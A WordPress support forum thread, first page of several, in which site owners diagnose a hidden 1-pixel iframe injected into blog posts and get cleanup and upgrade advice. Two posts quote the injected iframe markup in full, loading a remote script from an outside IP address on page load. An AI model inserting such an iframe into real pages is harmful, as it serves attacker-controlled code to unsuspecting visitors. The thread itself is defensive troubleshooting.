Title: iframe injection problem?
Last modified: August 18, 2016

---

# iframe injection problem?

 *  [lostplay](https://wordpress.org/support/users/lostplay/)
 * (@lostplay)
 * [18 years, 6 months ago](https://wordpress.org/support/topic/iframe-injection-problem/)
 * Hi,
 * I’ve searched around for a resolution to my problem but the closet thread I can
   find is this: [http://wordpress.org/support/topic/89912?replies=4](http://wordpress.org/support/topic/89912?replies=4)
 * Basically about a week ago my site began experiencing problems whenever I tried
   to access the home page >[http://www.heroes-hype.com](http://www.heroes-hype.com).
   The screen just freezes for about 10 minutes..sometimes it also throws me out(
   closes the browser). In the browser footer it displays the following:
 * waiting for [http://xx.xx.xx.xx./iframe/wp-stats.php](http://xx.xx.xx.xx./iframe/wp-stats.php)
 * (the ‘x’ is an IP address which I don’t recognise)
 * At first I suspected that it was a problem with the wp-stats plugin which I had
   just installed prior to this problem surfacing. So I removed the plugin (and 
   other plugins)..I also tried other themes and browsers, but a wee alter and the
   problem still remains.
 * So I contacted my host (as one of the threads here suggested I do) and they have
   reported to me the following:
 * “Your site was most likely injected with a 1px iframe due to a vulnerability 
   in WordPress — which is why 2.2.3 was rushed out and pushed out to everyone. 
   A number of sites have the same link which leads one to believe it was due to
   an exploit in either WordPress itself or the theme you’re using (which has also
   been called into question as of late).”
 * So now i’m wondering whether anyone can corroborate that this is the likely reason..
   and whether they is anything I can do to resolve the problem. I would of course
   like to upgrade to 2.3 asap, but I doubt this will solve the issue in itself..
   or will it?
 * Any advise would be much appreciated.
 * PS I am using the CSS Freak theme.

Viewing 15 replies - 1 through 15 (of 89 total)

1 [2](https://wordpress.org/support/topic/iframe-injection-problem/page/2/?output_format=md)
[3](https://wordpress.org/support/topic/iframe-injection-problem/page/3/?output_format=md)
[4](https://wordpress.org/support/topic/iframe-injection-problem/page/4/?output_format=md)
[5](https://wordpress.org/support/topic/iframe-injection-problem/page/5/?output_format=md)
[6](https://wordpress.org/support/topic/iframe-injection-problem/page/6/?output_format=md)
[→](https://wordpress.org/support/topic/iframe-injection-problem/page/2/?output_format=md)

 *  [whooami](https://wordpress.org/support/users/whooami/)
 * (@whooami)
 * [18 years, 6 months ago](https://wordpress.org/support/topic/iframe-injection-problem/#post-622649)
 * what is the xx.xx…
 * and you say the problem persists, after removing the stats plugin? I dont see
   the code on your site.
 * Without seeing the xx.xx.xx.xx.. its hard to say much.
 *  [whooami](https://wordpress.org/support/users/whooami/)
 * (@whooami)
 * [18 years, 6 months ago](https://wordpress.org/support/topic/iframe-injection-problem/#post-622653)
 * `http://61.132.75.71/iframe/wp-stats.php`
 * that? that goes to China, thats prolly not good.
 *  Thread Starter [lostplay](https://wordpress.org/support/users/lostplay/)
 * (@lostplay)
 * [18 years, 6 months ago](https://wordpress.org/support/topic/iframe-injection-problem/#post-622655)
 * Hi,
 * Yes, that’s the IP address..
 * Yep, I removed the wp-stats plugin because I originally assumed it was at fault
   and because I wanted to ensure that I had covered the basics before asking for
   advice.
 * Thanks for the feedback – do you (or anyone else) have any ideas on how to resolve
   this?
 *  [whooami](https://wordpress.org/support/users/whooami/)
 * (@whooami)
 * [18 years, 6 months ago](https://wordpress.org/support/topic/iframe-injection-problem/#post-622657)
 * its not on your single post pages .. have you looked inside your theme files?
   I would start there with looking at index.php
 * Look inside THIS post:
 * [http://heroes-hype.com/heroes-clues-global-tv-promo](http://heroes-hype.com/heroes-clues-global-tv-promo)
 *  Moderator [Samuel Wood (Otto)](https://wordpress.org/support/users/otto42/)
 * (@otto42)
 * WordPress.org Admin
 * [18 years, 6 months ago](https://wordpress.org/support/topic/iframe-injection-problem/#post-622662)
 * Step 1: Find where the code is being inserted. From what whooami is saying, it’s
   likely inside the content of one specific post. So look through that post and
   find and remove it.
 * Step 2: Upgrade to the current latest WordPress version (2.2.3). This has no 
   known security issues at this time.
 * Step 3: Keep up to date on WordPress releases. On the main dashboard, you’ll 
   always see new release information. Also, in WordPress 2.3 and up, WordPress 
   itself will start telling you when your version is out of date and give you info
   on how to upgrade. So that will be good.
 * Given that the code is inside a post’s content, then I’d say yeah, they likely
   did it through the exploit in version 2.2. Upgrade to 2.2.3, right now.
 *  Thread Starter [lostplay](https://wordpress.org/support/users/lostplay/)
 * (@lostplay)
 * [18 years, 6 months ago](https://wordpress.org/support/topic/iframe-injection-problem/#post-622666)
 * whooami – you’re a star! There was the following iframe inside that post:
 * <!– Traffic Statistics –>
    <iframe src=http://61.132.75.71/iframe/wp-stats.php
   width=1 height=1 frameborder=0></iframe> <!– End Traffic Statistics –>
 * So does this mean they were attempting to track my stats/traffic? Hmm..very nasty
   stuff. I have now removed it from that post.
 * Otto42 – thankyou for your help and advice also! I’m going to do as you advice
   and upgrade asap.
 * Thanks again, I suspect that you have both saved me hours of stress!
 *  [whooami](https://wordpress.org/support/users/whooami/)
 * (@whooami)
 * [18 years, 6 months ago](https://wordpress.org/support/topic/iframe-injection-problem/#post-622668)
 * _So does this mean they were attempting to track my stats/traffic?_
 * who knows, it would almost be interesting to make up a site that forges a referer
   thats a wp blog and see if anything can be figured out. I really cant see anyway
   that they can gleam anything worthwhile.
 *  Thread Starter [lostplay](https://wordpress.org/support/users/lostplay/)
 * (@lostplay)
 * [18 years, 6 months ago](https://wordpress.org/support/topic/iframe-injection-problem/#post-622672)
 * Hmm, it’s a strange one indeed. Anyway thanks for the headsup 🙂
 *  [toread](https://wordpress.org/support/users/toread/)
 * (@toread)
 * [18 years, 5 months ago](https://wordpress.org/support/topic/iframe-injection-problem/#post-622848)
 * Happened today on 2.3.1 site. The injected code was:
    <!– Traffic Statistics –
   > <iframe src=http://61.132.75.71/iframe/wp-stats.php width=1 height=1 frameborder
   =0></iframe> <!– End Traffic Statistics –>
 * Inside wp-stats.php is JavaScript code. Host 61.132.75.71 is in China. When can
   we expect a patch?
 *  [scchu](https://wordpress.org/support/users/scchu/)
 * (@scchu)
 * [18 years, 5 months ago](https://wordpress.org/support/topic/iframe-injection-problem/#post-622849)
 * Yup. The same thing happened to me. Running 2.3. I thought it must’ve been exploit
   for 2.3. But it turns out 2.3.1 is also vulnerable. I am not feeling too comfortable
   with this actually. And I just noticed it in a post I did 2 days ago!! Now I 
   gotta go back and dig them out… Argh…
 *  [daxman](https://wordpress.org/support/users/daxman/)
 * (@daxman)
 * [18 years, 5 months ago](https://wordpress.org/support/topic/iframe-injection-problem/#post-622851)
 * Happened to me too.
 *  [Chris Roberts](https://wordpress.org/support/users/columcille/)
 * (@columcille)
 * [18 years, 5 months ago](https://wordpress.org/support/topic/iframe-injection-problem/#post-622852)
 * Glad to find others discussing this. I’ve just noticed the same thing turning
   up in my blog, running v2.3. Was about to update to 2.3.1 but I see from comments
   on here that it is vulnerable as well.
 * Any idea what hole these are crawling through?
 *  [Chris Roberts](https://wordpress.org/support/users/columcille/)
 * (@columcille)
 * [18 years, 5 months ago](https://wordpress.org/support/topic/iframe-injection-problem/#post-622853)
 * Opened a ticket: [http://trac.wordpress.org/ticket/5313](http://trac.wordpress.org/ticket/5313)
 *  Moderator [Dion Hulse](https://wordpress.org/support/users/dd32/)
 * (@dd32)
 * Meta Developer
 * [18 years, 5 months ago](https://wordpress.org/support/topic/iframe-injection-problem/#post-622854)
 * Can anyone take a read through their webservers access logs and look for anything
   suspect accessing the admin pages?
    Also check for other users, and change the
   admin passwords. It is hard to work out what is happening here without knowing
   where the problem is coming from.
 *  [Lloyd Budd](https://wordpress.org/support/users/lloydbudd/)
 * (@lloydbudd)
 * [18 years, 5 months ago](https://wordpress.org/support/topic/iframe-injection-problem/#post-622855)
 * Inserting an iframe of that style is the common injection by at least one black
   hat seo ring — I’ve heard of that injection [http://xx.xx.xx.xx./iframe/wp-stats.php](http://xx.xx.xx.xx./iframe/wp-stats.php)
   being on on a Joomla! site.
 * Columcille, it’s still advisable to upgrade to 2.3.1 as it does address security
   issues. Including what WP theme, plugins, and other s/w is running on your host
   will help isolate the vector of the exploit.

Viewing 15 replies - 1 through 15 (of 89 total)

1 [2](https://wordpress.org/support/topic/iframe-injection-problem/page/2/?output_format=md)
[3](https://wordpress.org/support/topic/iframe-injection-problem/page/3/?output_format=md)
[4](https://wordpress.org/support/topic/iframe-injection-problem/page/4/?output_format=md)
[5](https://wordpress.org/support/topic/iframe-injection-problem/page/5/?output_format=md)
[6](https://wordpress.org/support/topic/iframe-injection-problem/page/6/?output_format=md)
[→](https://wordpress.org/support/topic/iframe-injection-problem/page/2/?output_format=md)

The topic ‘iframe injection problem?’ is closed to new replies.

## Tags

 * [iframe](https://wordpress.org/support/topic-tag/iframe/)

 * In: [Fixing WordPress](https://wordpress.org/support/forum/how-to-and-troubleshooting/)
 * 89 replies
 * 41 participants
 * Last reply from: [stoned](https://wordpress.org/support/users/stoned/)
 * Last activity: [17 years, 11 months ago](https://wordpress.org/support/topic/iframe-injection-problem/page/6/#post-622962)
 * Status: not resolved

## Topics

### Topics with no replies

### Non-support topics

### Resolved topics

### Unresolved topics

### All topics